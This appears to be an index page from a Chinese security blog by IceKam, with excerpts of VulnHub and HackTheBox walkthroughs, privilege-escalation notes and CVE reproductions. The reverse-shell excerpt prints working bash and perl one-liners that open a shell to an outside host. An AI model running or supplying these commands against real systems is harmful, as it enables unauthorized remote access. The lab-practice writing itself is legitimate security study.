Stapler: 1 练习记录
· ☕ 18 分钟 · ✍️ IceKam
环境介绍: 名称:Stapler: 1 日期:2016年6月8日 作者:g0tmi1k 系列:Stapler 说明:有多种方法可以做这台机器 至少两(2)

FristiLeaks: 1.3 vulnhub 练习记录
· ☕ 6 分钟 · ✍️ IceKam
环境介绍: 名称:FristiLeaks:1.3 日期:2015年12月14日 作者:Ar0xA 系列:FristiLeaks 说明:一个名为Fris

Kioptrix: 2014 (#5) VulnHub CTF 练习记录
· ☕ 3 分钟 · ✍️ IceKam
环境介绍: 名称:Kioptrix: 2014 (#5) 日期:2014年4月6日 作者:Kioptrix 系列:Kioptrix 说明:像往常一样,这个易受攻击的机

Linux 下反弹 shell 笔记
· ☕ 1 分钟 · ✍️ IceKam
前言 记录一些Linux下反弹Shell的姿势,本文转载自互联网。 内容 bash版本 1 bash -i >& /dev/tcp/www.icekam.com/8080 0>&1 perl版本 1 perl -e 'use Socket;$i="www.icekam.com";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'&1 python版本 1 python -c 'import

Mysql UDF 提权笔记
· ☕ 2 分钟 · ✍️ IceKam
前言 很久不玩提权了,练练手。 原理 udf = ‘user defined function‘,即‘用户自定义函数’。 文件后缀为‘.dll’,常用c语言编写。 通过在ud

Hackthebox 练习记录之 Lame
· ☕ 2 分钟 · ✍️ IceKam
前言 前段时间购入了VIP,工作原因一直没来得及练手。 近期我将由简到难,争取把Hackthebox的靶机都过一遍。 信息搜集 老规矩,扫一波。 PORT STATE

Hackthebox 练习记录之 Beep
· ☕ 2 分钟 · ✍️ IceKam
前言 继续练,前期计划每天四个简单的。 信息搜集 老规矩,扫一波。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40

三个 Linux 提权脚本
· ☕ 1 分钟 · ✍️ IceKam
Linuxprivchecker 简介 Linuxprivchecker.py - Linux权限升级检查脚本 [作者]:Mike Czumak(T_v3rn1x) 此脚本旨在在Linux机器上本地执行,以枚举基本系统信

Zabbix SQL注入漏洞(CVE-2016-10134) 复现 and Poc
· ☕ 1 分钟 · ✍️ IceKam
介绍 Zabbix是一个开源监控软件工具,适用于各种IT组件,包括网络,服务器,虚拟机和云服务。 Zabbix提供监控指标,其中包括网络利用率,

ThinkPHP5 5.0.23 远程代码执行漏洞 复现
· ☕ 1 分钟 · ✍️ IceKam
介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkP